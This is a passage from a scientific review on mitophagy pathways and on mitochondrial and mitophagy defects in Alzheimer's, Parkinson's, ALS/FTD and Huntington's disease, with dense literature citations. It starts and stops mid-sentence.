estimated to be about 30 days \[[@B22-cells-09-00150],[@B23-cells-09-00150]\], cells have developed the interconnected and elaborate pathways through the balance of mitochondrial biogenesis and efficient removal of damaged mitochondria to ensure the maintenance of mitochondrial integrity and bioenergetic functions. Mitophagy, a selective form of autophagy, constitutes a key pathway of mitochondrial quality control mechanisms involving sequestration of defective mitochondria into autophagosomes for subsequent lysosomal degradation \[[@B1-cells-09-00150],[@B2-cells-09-00150],[@B24-cells-09-00150],[@B25-cells-09-00150]\]. Disruption of mitophagy has been indicated in aging and various diseases, including neurodegenerative disorders such as Alzheimer's disease (AD), Parkinson's disease (PD), amyotrophic lateral sclerosis (ALS), and Huntington's disease (HD) \[[@B7-cells-09-00150],[@B26-cells-09-00150]\]. This review aims to provide a thorough and timely overview of the mitophagy pathways, summarize the underlying mechanisms of mitophagy defects in AD and other age-related neurodegenerative diseases, and highlight the possible therapeutic strategies targeting mitophagy towards confronting mitochondrial dysfunction and neurodegeneration. 2. Overview of the Mitophagy Pathways {#sec2-cells-09-00150} ===================================== Mitophagy (mitochondrial autophagy) is the only known cellular pathway through which entire mitochondria are completely eliminated within lysosomes. Under physiological conditions, mitophagy plays an essential role in the basal mitochondrial turnover and maintenance. More importantly, mitophagy can also be robustly induced in response to a variety of pathological stimuli \[[@B7-cells-09-00150],[@B25-cells-09-00150],[@B26-cells-09-00150],[@B27-cells-09-00150]\]. There are a number of mitophagy pathways that have been identified ([Figure 1](#cells-09-00150-f001){ref-type="fig"}). 2.1. PINK1-Parkin-Mediated Mitophagy {#sec2dot1-cells-09-00150} ------------------------------------ PTEN-induced putative kinase protein 1 (PINK1)-Parkin-mediated mitophagy is the most heavily studied and the best-understood mitophagy pathway \[[@B28-cells-09-00150],[@B29-cells-09-00150],[@B30-cells-09-00150]\]. In brief, loss of mitochondrial membrane potential (Δψ~m~) accumulates PINK1 on the outer membrane of mitochondria (OMM) to recruit and activate Parkin, an E3 ubiquitin ligase, through phosphorylation of ubiquitin \[[@B31-cells-09-00150],[@B32-cells-09-00150],[@B33-cells-09-00150],[@B34-cells-09-00150],[@B35-cells-09-00150],[@B36-cells-09-00150],[@B37-cells-09-00150],[@B38-cells-09-00150]\]. Parkin then ubiquitinates a number of OMM proteins and subsequently activates the ubiquitin-proteasome system (UPS) to degrade these ubiquitinated OMM proteins \[[@B39-cells-09-00150],[@B40-cells-09-00150],[@B41-cells-09-00150],[@B42-cells-09-00150],[@B43-cells-09-00150]\]. This leads to recruitment of the autophagy machinery to promote the engulfment of damaged mitochondria by phagophore or isolation membranes and thus formation of mitophagosomes destined for removal via the lysosomal system. The roles of PINK1 and Parkin in mitochondrial quality control and mitophagy have been supported by multiple studies in *Drosophila* \[[@B28-cells-09-00150],[@B44-cells-09-00150],[@B45-cells-09-00150],[@B46-cells-09-00150],[@B47-cells-09-00150]\]. The PINK1-Parkin pathway was shown to facilitate mitophagy as well as selective mitochondrial respiratory chain turnover \[[@B28-cells-09-00150],[@B44-cells-09-00150],[@B45-cells-09-00150],[@B46-cells-09-00150],[@B47-cells-09-00150]\]. Furthermore, genetic and clinical data have provided clear evidence to support the notion that the PINK1-Parkin pathway is involved in the pathogenesis of PD \[[@B48-cells-09-00150],[@B49-cells-09-00150]\]. However, recent in vivo studies indicate that PINK1 and Parkin are not critical for basal mitophagy in a range of tissues including the brain \[[@B50-cells-09-00150],[@B51-cells-09-00150]\]. More recent studies have been focused on understanding the PINK1-Parkin-independent mitophagy pathways. 2.2. Ubiquitin-Mediated Mitophagy Independent of Parkin {#sec2dot2-cells-09-00150} ------------------------------------------------------- Other E3 ubiquitin ligases that can also mediate removal dysfunctional mitochondria have been identified \[[@B52-cells-09-00150]\], which is with relation to PINK1-Parkin-independent mitophagy mechanisms. Mitochondrial ubiquitin ligase 1 (MUL1, also known as MAPL, GIDE, and MULAN) was reported to play a role in the regulation of mitophagy through multiple mechanisms. MUL1 interacts with mitochondrial fission GTPase protein dynamin-related protein 1 (Drp1) and mitochondrial fusion protein Mitofusin, both of which are the substrates of Parkin \[[@B53-cells-09-00150],[@B54-cells-09-00150]\]. MUL1 has no effect on PINK1-Parkin-mediated mitophagy, but can suppress PINK1 or Parkin mutant phenotypes in both *Drosophila* and mouse neurons. This suppression is attributed to the ubiquitin-dependent degradation of Mitofusin. Interestingly, double mutants of MUL1 with either PINK1 or Parkin show much more severe phenotypes. Moreover, MUL1 contains an LC3-interacting region (LIR) motif in the RING domain through which MUL1 interacts with GABAA receptor-associated protein (GABARAP), a member of the Atg8 family that plays a key role in autophagy and mitophagy \[[@B55-cells-09-00150]\]. Thus, these observations collectively suggest that MUL1 functions in a pathway parallel to the PINK1-Parkin pathway. In addition to MUL1, a recent study reported PINK1-synphilin-1-SIAH-1 as another newly discovered Parkin-independent pathway that can promote PINK1-dependent mitophagy in the absence of Parkin \[[@B56-cells-09-00150]\]. 2.3. Receptor-Mediated Mitophagy {#sec2dot3-cells-09-00150} -------------------------------- The BCL-2 homology 3 (BH3)-containing protein NIP3-like X (NIX, also known as BNIP3L), an OMM protein, was reported to play an important role in mitochondrial turnover in erythrocytes \[[@B57-cells-09-00150]\]. NIX/BNIP3L contains an LIR motif at the amino-terminal that binds to LC3 on phagophore or isolation membranes, and is transcriptionally upregulated during erythrocyte differentiation \[[@B58-cells-09-00150]\]. Such a mechanism enables NIX/BNIP3L to serve as a selective mitophagy receptor and promote recruitment of the autophagy machinery to the surface of damaged mitochondria in erythroid cells. NIX/BNIP3L was also reported to be involved in hypoxia-induced mitophagy, during which forkhead box O3 (FOXO3) and hypoxia-inducible factor (HIF) transcriptionally regulate NIX/BNIP3L along with BNIP3 \[[@B59-cells-09-00150]\]. Noteworthy, overexpression of NIX/BNIP3L can restore mitophagy in skin fibroblasts from PD patients carrying mutations in *PARK6* or *PARK2* \[[@B60-cells-09-00150]\], suggesting an independent role of NIX/BNIP3L in PINK1-Parkin-mediated mitophagy. NIX/BNIP3L and BNIP3 were reported to be upregulated upon neuronal stress \[[@B61-cells-09-00150],[@B62-cells-09-00150]\]. However, the extent to which NIX/BNIP3L and BNIP3 might participate in neuronal mitophagy remains unclear. FUN14 domain containing 1 (FUNDC1) also functions as a mitophagy receptor and regulates the autophagic clearance of mitochondria under hypoxic stress. Studies have demonstrated that the mitochondrial phosphatase phosphoglycerate mutase family member 5 (PGAM5) dephosphorylates FUNDC1 to activate mitophagy during hypoxia \[[@B63-cells-09-00150],[@B64-cells-09-00150],[@B65-cells-09-00150]\]. Additionally, FK506 Binding Protein 8 (FKBP8) was recently reported to have LIR domains and can mediate Parkin-independent mitophagy by recruiting LC3A \[[@B66-cells-09-00150]\]. Collectively, these observations suggest that specific mitophagy receptors on the OMM play an essential role in recruiting the autophagy machinery to damaged mitochondria for lysosomal clearance. 2.4. Lipid-Mediated Mitophagy {#sec2dot4-cells-09-00150} ----------------------------- Recent studies have demonstrated that lipids can also act as an elimination signal to mediate recruitment of injured mitochondria to the autophagy pathway. Apart from ubiquitin- or receptor-mediated mitophagy, this pathway involves the direct interaction of LC3 with the phospholipid cardiolipin, and was originally observed in neuroblastoma cells and primary cortical neurons incubated with rotenone, staurosporine, or 6-hydroxydopamine \[[@B67-cells-09-00150]\]. Cardiolipin is primarily found in the inner membrane of mitochondria (IMM) and is externalized to the OMM upon mitochondrial damage. Three enzymatic translocations are needed for the externalization of cardiolipin, which are mediated by the phospholipid scramblase-3 of mitochondria and the inner and outer membrane spanning hexameric complex of mitochondrial nucleoside diphosphate kinase D (NDPK-D/NM23-H4) in SH-SY5Y cells or Tafazzin (TAZ) in mouse embryonic fibroblasts (MEFs), respectively \[[@B67-cells-09-00150],[@B68-cells-09-00150],[@B69-cells-09-00150]\]. Furthermore, cardiolipin interacts with LC3, and this interaction is facilitated by the negatively charged basic residues in LC3 and charged head group of cardiolipin. Thus, cardiolipin-mediated mitophagy is independent of PINK1 and Parkin. Importantly, cardiolipin downregulation or mutagenesis of LC3 at the sites predicted to interact with cardiolipin was shown to impair mitophagosome formation \[[@B67-cells-09-00150]\]. In addition, genome-wide screens indicate that F-box and WD40 domain protein 7 (FBXW7), sterol regulatory element binding transcription factor 1 (SREBF1), and other components of the lipogenesis pathway may play a role in the regulation of Parkin-mediated mitophagy \[[@B70-cells-09-00150]\]. Additionally, upon Drp1-mediated mitochondrial fission, ceramide was shown to promote autophagic recruitment of mitochondria through direct interaction of ceramide with LC3B-II \[[@B71-cells-09-00150]\]. 2.5. Neuronal Mitophagy {#sec2dot5-cells-09-00150} ----------------------- Neurons are highly polarized cells with unique properties in structure and function. Mitochondrial quality control mechanisms that efficiently sense and eliminate mitochondria damaged over usage, aging, or disease could be critical for neuronal health. Mitophagy is currently believed to constitute the major cellular pathway for mitochondrial quality control in neurons. While basal mitophagy is known to be required for the maintenance of neuronal homeostasis, mounting evidence has shown that mitophagy can be upregulated in response to various pathological stimuli ([Figure 2](#cells-09-00150-f002){ref-type="fig"}). Cardiolipin-mediated mitophagy can be induced in primary cortical neurons treated with the mitochondrial complex I inhibitor rotenone \[[@B67-cells-09-00150]\]. As for Parkin-mediated mitophagy, Δψ~m~ dissipation triggers Parkin translocation onto depolarized mitochondria in neurons after treatment with CCCP, an Δψ~m~ uncoupler \[[@B72-cells-09-00150],[@B73-cells-09-00150]\]. Interestingly, Parkin-targeted mitochondria primarily accumulate in the somatodendritic region of neurons where they undergo autophagic sequestration for lysosomal degradation. Moreover, mitophagy activation reduces anterograde transport, but increases retrograde transport of axonal mitochondria, suggesting that damaged mitochondria are trafficked back to the soma for mitophagic clearance. Parkin-dependent mitophagy was also discovered under AD-linked pathophysiological conditions in the absence of any Δψ~m~ dissipating reagent \[[@B74-cells-09-00150]\]. The spatial aspects of Parkin-dependent mitophagy were also observed in vivo. In particular, the PINK1 and Parkin mutant *Drosophila* exhibit abnormal tubular and reticular mitochondria restricted to the cell body, as well as normal morphology with reduced mitochondrial flux within axons \[[@B46-cells-09-00150],[@B47-cells-09-00150]\]. In addition to *Drosophila*, the evidence from examination of Purkinje neurons in the mito-QC reporter mice suggests that the majority of mitochondrial turnover occurs in the Purkinje somata. This supports the view that damaged mitochondria or mitophagosomes are returned to the cell body for lysosomal clearance \[[@B75-cells-09-00150]\]. Collectively, these in vitro and in vivo observations consistently suggest that the soma is in the focus of neuronal mitophagy, a selective process with a function to restrict damaged mitochondria to the soma and thus limit the impact of impaired mitochondrial function on distal axons. 2.6. Mitophagy In Vivo {#sec2dot6-cells-09-00150} ---------------------- The mitophagy pathways have been extensively studied *in vitro*. To address the basal mitophagy in vivo, a number of transgenic mice expressing sensors to monitor the delivery of mitochondria to acidic organelles (lysosomes) have been developed \[[@B75-cells-09-00150],[@B76-cells-09-00150]\]. These studies have demonstrated active mitochondrial delivery to acidic organelles in multiple tissues but with variable rates. A recent work further shows that the basal mitophagy is independent of the PINK1 pathway \[[@B51-cells-09-00150]\]. Consistently, studies from *Drosophila* expressing fluorescent mitophagy reporters, either mito-Keima or mito-QC, also reveal robust basal mitophagy in different tissues \[[@B50-cells-09-00150]\]. However, null mutations of either PINK1 or Parkin do not lead to altered rates of mitochondrial delivery into lysosomes, suggesting nonessential roles of PINK1 and Parkin in the basal mitophagy in vivo. These data are also consistent with the observations from mice with the deletion of *PARK6* or *PARK2*. These mice lack strong phenotypes, such as dopaminergic neuron loss \[[@B77-cells-09-00150],[@B78-cells-09-00150],[@B79-cells-09-00150],[@B80-cells-09-00150],[@B81-cells-09-00150]\]. Importantly, the evidence of mitophagy activation is clear in the brain tissues of human patients with neurodegenerative diseases \[[@B74-cells-09-00150],[@B82-cells-09-00150],[@B83-cells-09-00150]\]. Given multiple distinct mechanisms that have been identified to target damaged mitochondria for autophagy, other PINK1-Parkin-independent pathways or other as yet undefined mechanisms likely play more important role in the basal neuronal mitophagy. Therefore, the involvement of these mitophagy pathways in the basal mitochondrial turnover and in response to specific disease-related stressors needs to be carefully determined in vivo. 3. Mitochondrial Dysfunction in Neurodegenerative Diseases {#sec3-cells-09-00150} ========================================================== Mitochondrial defects are a significant concern in the aging nervous system and have been consistently linked to age-related neurodegenerative diseases, suggesting that the underlying mechanisms might be somewhat shared ([Figure 3](#cells-09-00150-f003){ref-type="fig"}). 3.1. Aβ and Tau-Linked Mitochondrial Abnormalities {#sec3dot1-cells-09-00150} -------------------------------------------------- AD is the most common form of neurodegenerative diseases in aging populations. Progression of the disease involves cognitive decline, memory loss, and neuronal death in the cerebral cortex and subcortical regions. AD patient brains are characterized by extracellular amyloid plaque deposits, composed of agglomerated amyloid β (Aβ) peptides, as well as intracellular accumulation of neurofibrillary tangles (NFTs), consisting of hyperphosphorylated tau (phospho-tau) protein. Mitochondrial disturbances have been suggested as a hallmark of AD as the patients exhibit early metabolic alterations prior to any histopathological or clinical manifestations \[[@B84-cells-09-00150]\]. Mitochondrial dysfunction, oxidative stress, and mitochondrial DNA (mtDNA) changes are prominent pathological features reported in AD postmortem brains \[[@B85-cells-09-00150],[@B86-cells-09-00150],[@B87-cells-09-00150],[@B88-cells-09-00150],[@B89-cells-09-00150],[@B90-cells-09-00150],[@B91-cells-09-00150],[@B92-cells-09-00150],[@B93-cells-09-00150],[@B94-cells-09-00150],[@B95-cells-09-00150]\]. Importantly, a growing body of evidence has indicated a major role of mitochondrial defects in the pathogenesis of AD \[[@B2-cells-09-00150],[@B96-cells-09-00150],[@B97-cells-09-00150],[@B98-cells-09-00150]\]. The degree of cognitive dysfunction in AD was linked to the extent of Aβ accumulation within mitochondria and mitochondrial abnormalities \[[@B99-cells-09-00150]\]. Aβ has been proposed to be a key player in mediating mitochondrial damage. Aβ was found to impair multiple aspects of mitochondrial function \[[@B100-cells-09-00150],[@B101-cells-09-00150],[@B102-cells-09-00150]\], including function of the electron transport chain (ETC) \[[@B103-cells-09-00150]\], ROS production \[[@B104-cells-09-00150],[@B105-cells-09-00150],[@B106-cells-09-00150]\], mitochondrial dynamics \[[@B91-cells-09-00150],[@B103-cells-09-00150],[@B107-cells-09-00150],[@B108-cells-09-00150]\], and mitochondrial transport \[[@B109-cells-09-00150],[@B110-cells-09-00150],[@B111-cells-09-00150]\]. The possible routes for Aβ to enter into mitochondria were thought to be through the translocase of the outer membrane (TOM) complex or mitochondrial-associated endoplasmic reticulum (ER) membrane (MAM) \[[@B112-cells-09-00150],[@B113-cells-09-00150],[@B114-cells-09-00150],[@B115-cells-09-00150]\]. In addition to intracellular Aβ, mitochondria can also take up internalized extracellular Aβ \[[@B114-cells-09-00150],[@B116-cells-09-00150]\]. Aβ1--42 treatment was shown to lead to the opening of mitochondrial permeability transition pore (mPTP) in cultured cortical neural progenitor cells. While transient mPTP opening decreases cell proliferation, prolonged mPTP opening irreversibly causes cell death \[[@B117-cells-09-00150]\]. Consistent with this observation, an interesting work in a live AD mouse model provided direct evidence that fragmented and defective mitochondria are limited to the vicinity of extracellular amyloid plaques that likely serve as a focal source to promote abnormal accumulation of Aβ within mitochondria and thus exacerbate Aβ-linked damage \[[@B118-cells-09-00150]\]. The mechanisms underlying Aβ-mediated mitochondrial toxicity have been carefully investigated by several studies. The interactions of Aβ with Aβ-binding alcohol dehydrogenase (ABAD), a mitochondrial matrix protein, and cyclophilin D (CypD), a component of the mitochondrial transition pore, were reported to mediate Aβ-induced cytotoxic effects \[[@B101-cells-09-00150],[@B102-cells-09-00150]\]. In particular, ABAD was shown to be upregulated in AD neurons. Overexpression of ABAD can exacerbate Aβ-induced cellular oxidative stress and cell death. Aβ also forms a complex with CypD in the cortical regions of postmortem human AD patient brains and an AD mouse model \[[@B102-cells-09-00150]\]. Deletion of CypD in AD mice rescues the mitochondrial phenotypes including impaired Ca^2+^ uptake, mitochondrial swelling due to increased Ca^2+^, depolarized Δψ~m~, elevated oxidative stress, decrease in ADP-induced respiration control rate, and reduced complex IV activity and ATP levels. Moreover, CypD deficiency can improve synaptic function as well as learning and memory in an AD mouse model \[[@B102-cells-09-00150]\]. These observations collectively suggest that Aβ-CypD interaction mediates AD-associated mitochondrial defects. Taken together, these pieces of evidence indicate that the aberrant accumulation of Aβ within mitochondria likely plays a causative role in impaired mitochondrial function in AD. Pathogenic forms of tau can also induce mitochondrial damage. A number of studies have demonstrated that phospho-tau specifically impairs complex I of the mitochondrial respiratory chain, resulting in increased ROS production, loss of Δψ~m~, lipid peroxidation, and reduced activities of detoxifying enzymes such as superoxide dismutase (SOD) \[[@B119-cells-09-00150],[@B120-cells-09-00150]\]. Overexpression of the mutant human tau protein htauP301L was reported to reduce ATP levels and increase susceptibility to oxidative stress in cultured neuroblastoma cells \[[@B121-cells-09-00150]\]. Disrupted activity and altered composition of mitochondrial enzymes can also be detected in the P301S mouse model of tauopathy \[[@B122-cells-09-00150]\]. In the pR5 mice overexpressing the htauP301L, mitochondrial dysfunction was evidenced by impaired mitochondrial respiration and ATP synthesis, decreased complex I activity, and increased ROS levels \[[@B123-cells-09-00150],[@B124-cells-09-00150]\]. Phospho-tau was also reported to directly interact with VDAC in AD brains. This interaction was proposed to impair mitochondrial function likely through blocking mitochondrial pores \[[@B125-cells-09-00150]\]. Furthermore, mitochondrial stress was shown, in turn, to enhance hyperphosphorylation of tau in a mouse model lacking SOD2 \[[@B126-cells-09-00150]\]. Inhibition of mitochondrial complex I activity reduces ATP levels, resulting in a redistribution of tau from the axon to the soma and subsequent cell death \[[@B127-cells-09-00150]\]. Thus, these observations suggest that the toxic effects of tau on mitochondria could be reciprocal and that mitochondrial deficiency might play a critical role in the development of tau pathology. Both Aβ and pathogenic tau have deleterious effects on mitochondrial dynamics through which impact mitochondrial function. Studies on postmortem brain tissues from human patients with AD and mouse models have demonstrated increased levels of Drp1 and Fis1 and reduced levels of mitofusin 1 (Mfn1), Mfn2, and OPA1. Moreover, Aβ overproduction, phospho-tau accumulation, as well as abnormal interactions of Drp1 with Aβ or phospho-tau cause excessive mitochondrial fission and fragmentation, which tend to increase as AD progresses \[[@B91-cells-09-00150],[@B97-cells-09-00150],[@B108-cells-09-00150],[@B125-cells-09-00150],[@B128-cells-09-00150]\]. Cells overexpressing mutant tau associated with frontotemporal dementia (FTD) with Parkinsonism linked to chromosome 17 (FTDP-17) display decreased rates of mitochondrial fusion and fission and enhanced vulnerability to oxidative stress \[[@B121-cells-09-00150]\]. Strikingly, reduction of Drp1 expression can protect against mutated tau-induced mitochondrial dysfunction \[[@B129-cells-09-00150]\]. Collectively, these data suggest that the pathogenic forms of tau and Aβ could impair mitochondrial function either through direct interaction with VDAC, ABAD, or CypD, or indirectly through their toxic effects on mitochondrial dynamics. 3.2. Mitochondrial Defects with Synucleinopathies {#sec3dot2-cells-09-00150} ------------------------------------------------- PD is the second most common form of neurodegenerative disease, which is characterized by the aberrant accumulation of α-synuclein (α-syn) in the form of Lewy bodies, especially in the substantia nigra. α-syn is abundant throughout the central nervous system and Lewy bodies are a defining feature of many clinical phenotypes known as synucleinopathies \[[@B130-cells-09-00150],[@B131-cells-09-00150]\]. Importantly, impaired mitochondrial function is also a pathological feature of both sporadic and familial PD \[[@B20-cells-09-00150],[@B28-cells-09-00150],[@B44-cells-09-00150],[@B49-cells-09-00150],[@B132-cells-09-00150],[@B133-cells-09-00150],[@B134-cells-09-00150]\]. The relationship between α-syn and mitochondria has been explored in many studies. Some evidence showed that mitochondria could be the main targets of α-syn. In particular, the oligomerization and aggregation of α-syn can cause deficits in the complex I activities, leading to reduced ATP levels, depolarized Δψ~m~, and the release of cytochrome *c* into the cytosol to trigger apoptosis \[[@B135-cells-09-00150],[@B136-cells-09-00150]\]. A number of studies have shown that α-syn is directly localized in mitochondria, and can be detected in isolated mitochondria from PD patient brains. Mitochondrial localization of α-syn has a negative impact on mitochondrial function, morphology, and dynamics \[[@B137-cells-09-00150],[@B138-cells-09-00150],[@B139-cells-09-00150],[@B140-cells-09-00150],[@B141-cells-09-00150],[@B142-cells-09-00150],[@B143-cells-09-00150]\]. α-syn has a cryptic mitochondrial targeting sequence located at its amino terminal region through which α-syn is constitutively imported into mitochondria and associates with the IMM. Such a mechanism leads to reduced complex I activities and elevated ROS levels in human dopaminergic neurons \[[@B140-cells-09-00150]\]. Moreover, oligomeric and dopamine-modified α-syn disrupts the association of the OMM translocase TOM20 and its coreceptor, TOM22, resulting in protein import impairment \[[@B144-cells-09-00150]\]. Thus, diminished import of mitochondrial proteins impairs mitochondrial function in nigrostriatal neurons, as reflected by deficient respiration, loss of Δψ~m~, and enhanced production of ROS. α-syn can also affect mitochondrial dynamics and mitophagy. Basically, α-syn is known to bind to the lipid membranes, especially the lipids of the ER membrane or the MAM through which ER interacts with mitochondria. Mutated α-syn decreases the ER-mitochondria contact or interaction, leading to MAM dysfunction and thus mitochondrial fragmentation \[[@B141-cells-09-00150]\]. Other studies into PD have demonstrated that α-syn causes mitochondrial fragmentation through either direct binding or as a result of increased Drp1 \[[@B142-cells-09-00150],[@B145-cells-09-00150]\]. Cleavage of Opa1 was found in dopaminergic neurons with overexpression of α-syn, resulting in decreased mitochondrial fusion \[[@B145-cells-09-00150]\]. Consistently, suppression of Drp1-mediated mitochondrial fission was reported to protect cells from α-syn-induced cytotoxicity \[[@B146-cells-09-00150]\]. In addition, studies have demonstrated the direct binding of α-syn to cardiolipin \[[@B147-cells-09-00150],[@B148-cells-09-00150]\]. Furthermore, PD-related SNCA-mutant neurons exhibit increased externalization of cardiolipin to the OMM. Externalized cardiolipin was shown to bind to and promote refolding α-syn fibrils. Importantly, the exposed cardiolipin initiates LC3 recruitment to mitochondria and thus enhances mitophagic turnover, leading to reduced mitochondrial volume and exacerbation of mutant α-syn-induced mitochondrial dysfunction \[[@B148-cells-09-00150]\]. On the other hand, mitophagy defects were also proposed to play a significant role in PD pathogenesis, especially augmenting α-syn accumulation and its mediated neurotoxicity \[[@B149-cells-09-00150],[@B150-cells-09-00150],[@B151-cells-09-00150]\]. 3.3. ALS and FTD-Associated Mitochondrial Toxicity {#sec3dot3-cells-09-00150} -------------------------------------------------- ALS is a devastating disease characterized by motor neuron degeneration. A hallmark of ALS, as in the pathologies of other neurodegenerative diseases, is the abnormal accumulation of misfolded proteins and protein aggregates within the affected motor neurons. FTD affects the basal ganglia and cortical neurons, leading to cognitive deficits, language deficiency along with altered social behavior and conduct. Even though the affected neuron types are quite different, ALS and FTD show the similarities in genetic background and pathological processes and also share the common pathways of neurodegeneration \[[@B152-cells-09-00150],[@B153-cells-09-00150]\]. Defects in oxidative phosphorylation, Ca^2+^ buffering, and increased ROS production have been linked to ALS pathogenesis \[[@B154-cells-09-00150]\]. Multiple studies in cell culture and in transgenic animal models of ALS reveal alterations in oxidative metabolism linked to changes in ETC activity and reduced ATP synthesis \[[@B155-cells-09-00150],[@B156-cells-09-00150],[@B157-cells-09-00150],[@B158-cells-09-00150]\]. More importantly, mitochondria purified from ALS patients display impaired Ca^2+^ homeostasis and increased ROS levels. Such defects are coupled with oxidative damage including altered tyrosine nitration and protein carbonylation \[[@B159-cells-09-00150],[@B160-cells-09-00150]\]. Indeed, glutamate-receptor mediated excitotoxicity was linked to overloaded mitochondrial Ca^2+^ and increased ROS levels in spinal motor neurons cultured from an ALS animal model \[[@B161-cells-09-00150]\]. Aggregation of the transactive response DNA-binding protein 43 kDa (TDP-43) and fused in sarcoma (FUS) is the pathological hallmarks of both ALS and FTD. Both TDP-43 and FUS are ribonuclear proteins and contain the glycine molecule-enriched prion-like domains that can increase the propensity of TDP-43 and FUS for aggregation as well as cell-to-cell transmission. Aged animals expressing mutant FUS exhibit abnormal accumulation of ubiquitin-positive aggregates, which correlates with neuron loss. These aggregates also stain positive for mitochondrial protein cytochrome *c*, suggesting that damaged mitochondria recruit the autophagy machinery for removal through mitophagy \[[@B162-cells-09-00150]\]. One study from a single postmortem analysis of an FUS mutation carrier uncovered similar defects. Additionally, C- and N-terminal fragments of TDP-43 were identified within mitochondria. Furthermore, animal models of TDP-43 pathology exhibit membranous organelle redistribution and clustering within cytoplasmic inclusions accompanied by morphological and ultrastructural alterations, as well as abnormal mitochondrial dynamics, trafficking, and quality control \[[@B163-cells-09-00150],[@B164-cells-09-00150],[@B165-cells-09-00150]\]. Thus, these data consistently indicate the phenotypes of mislocalized, fragmented, and defective mitochondria associated with ALS and FTD. 3.4. Mutant Htt-Induced Mitochondrial Damage {#sec3dot4-cells-09-00150} -------------------------------------------- HD is a neurodegenerative genetic disease that affects muscle coordination and leads to cognitive decline and psychiatric symptoms \[[@B166-cells-09-00150]\]. This autosomal dominant inherited neurodegenerative disease is the most common genetic cause of abnormal involuntary movements called chorea, and is characterized by mutations in the huntingtin gene (*HTT*) that result in abnormal expansion of the cytosine--adenine--guanine (CAG) trinucleotide repeats in the *HTT* gene, encoding a polyglutamine (polyQ) tract at the N-terminal region of the huntingtin (Htt) protein. The N-terminus of Htt can be cleaved through protease activity, leading to formation of short and toxic polyQ peptides. The N-terminal fragments of Htt containing the polyQ tracts are more prone to aggregation and accumulate within the inclusions in the nucleus especially in the medium spiny neurons of the striatum \[[@B167-cells-09-00150],[@B168-cells-09-00150],[@B169-cells-09-00150],[@B170-cells-09-00150],[@B171-cells-09-00150]\]. Htt was reported to directly bind to Tim 23 on mitochondria, thus preventing the protein import into mitochondria. This defect could be reversed through overexpressing Tim 23 \[[@B172-cells-09-00150],[@B173-cells-09-00150]\]. In addition, the aggregate accumulation can disrupt the ETC function \[[@B174-cells-09-00150]\]. Moreover, studies in HD patient brains found decreased activities of complex II, complex III, and complex IV. Reduced complex II activity was observed particularly in the striatum of HD patients. Such defects along with reduced ATP production were also demonstrated in other studies, which collectively point towards impaired OXPHOS and disrupted mitochondrial energy metabolism \[[@B175-cells-09-00150]\]. Importantly, overexpression of complex II reduces the mutant Htt-mediated toxic effects in striatal neurons. Moreover, alterations in mitochondrial dynamics were also reported in the striatum of HD patients, as well as in animal and cell models \[[@B176-cells-09-00150],[@B177-cells-09-00150]\]. Such a defect is caused by abnormal interaction of mutant Htt with Drp1, leading to Drp1-enhanced mitochondrial fission and thus mitochondrial fragmentation as well as cellular dysregulation and death \[[@B178-cells-09-00150]\]. 4. Mitophagy Defects in Neurodegenerative Diseases {#sec4-cells-09-00150} ================================================== Neurons have very high demand for ATP. Given that mitochondria are the major producer of ATP within cells, the nervous system is especially sensitive to mitochondrial damage. Inefficient elimination of injured mitochondria through mitophagy could be detrimental to neuronal health. Mitophagy deficit has been indicated in aging and the pathogenesis of age-associated neurodegenerative disorders. Studies into mitophagy suggest that defective mitophagy contributes to impaired mitochondrial function and neurodegeneration ([Figure 4](#cells-09-00150-f004){ref-type="fig"}). 4.1. Mitophagy Defects in AD {#sec4dot1-cells-09-00150} ---------------------------- Earlier studies revealed abnormal mitophagy in AD patient brains, as evidenced by autophagic accumulation of mitochondria in the soma of vulnerable AD neurons \[[@B87-cells-09-00150],[@B179-cells-09-00150],[@B180-cells-09-00150]\]. Among the multiple distinct mitophagy pathways, PINK1-Parkin-dependent mitophagy has been the focus of current studies in AD. We have shown that the Parkin pathway is robustly induced upon progressive Aβ accumulation and mitochondrial damage in human patient brains and animal models of AD \[[@B74-cells-09-00150]\]. Furthermore, cytosolic Parkin is depleted in AD brains over the disease's progression, resulting in mitophagic pathology and augmented mitochondrial defects. Consistently, in the AD patient-derived skin fibroblasts and brain biopsies, another study reported diminished Parkin along with abnormal PINK1 accumulation \[[@B181-cells-09-00150]\]. Mitophagy can be restored in these cells by overexpression of Parkin, as reflected by decreased PINK1 and the recovery of Δψ~m~ coupled with reduced retention of defective mitochondria. Therefore, these findings indicate that impaired mitochondrial function and abnormal retention of dysfunctional mitochondria could be attributed to mitophagy defects in AD neurons. In addition, cardiolipin cluster-organized profile was shown to be lost in synaptic mitochondria purified from AD mouse models \[[@B182-cells-09-00150]\], occurring at the early disease stages and before nonsynaptic mitochondrial defects. This data suggests the possibility that cardiolipin-mediated mitophagy might be deficient in AD. The degradation capacity of lysosomes is critical for mitophagic clearance, and defects in lysosomal proteolysis of autophagic cargoes can also impair the mitophagy function. Lysosomal deficit is a prominent feature in AD brains, linked to the pathogenesis of AD. Suppression of lysosomal proteolysis in wild-type (WT) mice was shown to mimic neuropathology of AD and exacerbate autophagic pathology and amyloidogenesis in AD mouse models \[[@B183-cells-09-00150],[@B184-cells-09-00150]\]. Presenilin 1 mutations along with ApoE4, a key genetic risk factor of AD, are thought to disrupt lysosomal function \[[@B185-cells-09-00150]\]. Other factors, including Aβ peptides, phospho-tau, ROS, and oxidized lipids and lipoproteins, could also impair lysosomal proteolysis and result in a toxic accumulation, thus triggering apoptosis and neuronal death in AD. Our recent study proposes that AD-linked lysosomal deficit is also attributed to defects in protease targeting to lysosomes \[[@B186-cells-09-00150]\]. It is known that newly synthesized protease precursors need to be delivered from the trans-Golgi network (TGN) to the endo-lysosomal system for maturation, a process that relies on the presence of cation-independent mannose 6-phosphate receptor (CI-MPR) at the Golgi. The retromer complex mediates the retrieval of CI-MPR from late endosomes to the TGN and thus facilitates the trafficking of proteases to late endosomes and lysosomes \[[@B187-cells-09-00150]\]. Our study reveals that retromer dysfunction and defective CI-MPR recycling to the Golgi lead to defects in protease targeting to lysosomes. As a result, protease deficit within lysosomes impedes lysosomal proteolysis of defective mitochondria along with other autophagic cargoes in AD neurons \[[@B186-cells-09-00150]\]. Therefore, increased Parkin association with mitochondria, autophagic accumulation, as well as abnormal mitochondrial retention within lysosomes observed in AD neurons of patient brains and in cultured cells overexpressing mutant APP could also represent lysosomal deficiency \[[@B74-cells-09-00150],[@B186-cells-09-00150]\]. Taken together, these observations indicate that defective mitophagy is likely involved in AD-linked neurodegeneration. Pathogenic truncation of tau could impair mitophagy function. A recent work reported a stable association of an NH2-htau fragment with Parkin and Ubiquitin-C-terminal hydrolase L1 (UCHL-1) in cellular and animal AD models and human AD brains, leading to enhanced mitochondrial recruitment of Parkin and 